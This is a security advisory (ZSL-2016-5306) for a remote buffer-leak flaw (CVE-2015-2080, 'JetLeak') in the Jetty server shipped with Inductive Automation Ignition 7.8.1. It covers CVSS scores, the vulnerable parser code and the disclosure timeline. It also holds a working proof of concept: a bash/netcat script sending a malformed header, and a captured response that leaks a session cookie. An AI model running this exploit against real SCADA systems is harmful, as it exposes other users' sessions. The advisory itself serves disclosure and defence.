Gjoko KrsticZSL-2016-5306Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.8 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.953 High
EPSS
Percentile
99.3%
Title: Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Advisory ID: ZSL-2016-5306
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 16.02.2016
Summary
Ignition is a powerful industrial application platform with fully integrated development tools for building SCADA, MES, and IIoT solutions.
Description
Remote unauthenticated atackers are able to read arbitrary data from other HTTP sessions because Ignition uses a vulnerable Jetty server. When the Jetty web server receives a HTTP request, the below code is used to parse through the HTTP headers and their associated values. The server begins by looping through each character for a given header value and checks the following:
- On Line 1164, the server checks if the character is printable ASCII or not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (or less than 0x20), then all of the checks above are skipped over and the code throws an ‘IllegalCharacter’ exception on line 1186, passing in the illegal character and a shared buffer.
--------------------------------------------------------------------------------
` File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[…snip…]
1163: case HEADER_VALUE:
1164: if (ch>HttpTokens.SPACE || ch<0)
1165: {
1166: _string.append((char)(0xff&ch));
1167: _length=_string.length();
1168: setState(State.HEADER_IN_VALUE);
1169: break;
1170: }
1171:
1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173: break;
1174:
1175: if (ch==HttpTokens.LINE_FEED)
1176: {
1177: if (_length > 0)
1178: {
1179: _value=null;
1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181: }
1182: setState(State.HEADER);
1183: break;
1184: }
1185:
1186: throw new IllegalCharacter(ch,buffer);
`
--------------------------------------------------------------------------------
Vendor
Inductive Automation - <http://www.inductiveautomation.com>
Affected Version
7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Ubuntu Linux 14.04
Mac OS X
HP-UX Itanium
Jetty(9.2.z-SNAPSHOT)
Java/1.8.0_73
Java/1.8.0_66
Vendor Status
[14.01.2016] Vulnerability discovered.
[20.01.2016] Vendor contacted.
[15.02.2016] No response from the vendor.
[16.02.2016] Public security advisory released.
[22.02.2016] Vendor informs that version 7.8.1 is patched with Jetty 9.3.3v20150827.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html>
[2] <https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py>
[3] <http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md>
[4] <https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md>
[5] <https://vulners.com/cve/CVE-2015-2080>
[6] <https://cxsecurity.com/issue/WLB-2016020156>
[7] <https://packetstormsecurity.com/files/135804>
[8] <https://www.exploit-db.com/exploits/39455/>
[9] <http://www.vfocus.net/art/20160222/12576.html>
[10] https://www.incibe.es/securityAdvice/CERT_en/ics_advisories/Inductive_Automation_Ignition
Changelog
[16.02.2016] - Initial release
[17.02.2016] - Added reference [6] and [7]
[18.02.2016] - Added reference [8]
[22.02.2016] - Added vendor status and reference [9] and [10]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java
Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.
Desc: Remote unauthenticated atackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives a HTTP request, the below code is used
to parse through the HTTP headers and their associated values. The server
begins by looping through each character for a given header value and checks
the following:
- On Line 1164, the server checks if the character is printable ASCII or
not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (or less than 0x20), then all
of the checks above are skipped over and the code throws an 'IllegalCharacter'
exception on line 1186, passing in the illegal character and a shared buffer.
---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[..snip..]
1163: case HEADER_VALUE:
1164: if (ch>HttpTokens.SPACE || ch<0)
1165: {
1166: _string.append((char)(0xff&ch));
1167: _length=_string.length();
1168: setState(State.HEADER_IN_VALUE);
1169: break;
1170: }
1171:
1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173: break;
1174:
1175: if (ch==HttpTokens.LINE_FEED)
1176: {
1177: if (_length > 0)
1178: {
1179: _value=null;
1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181: }
1182: setState(State.HEADER);
1183: break;
1184: }
1185:
1186: throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Ubuntu Linux 14.04
Mac OS X
HP-UX Itanium
Jetty(9.2.z-SNAPSHOT)
Java/1.8.0_73
Java/1.8.0_66
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
14.01.2016
---
#######################
#!/bin/bash
#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'
function normalRequest {
echo "-- Normal Request --"
nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63
NORMREQ
}
function badCookie {
echo "-- Bad Cookie --"
nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}
BADCOOKIE
}
normalRequest
echo ""
echo ""
badCookie
#######################
Original raw analysis request via proxy using Referer:
------------------------------------------------------
GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00
Response leaking part of Cookie session:
----------------------------------------
HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)
</p></body></html>Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.8 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.953 High
EPSS
Percentile
99.3%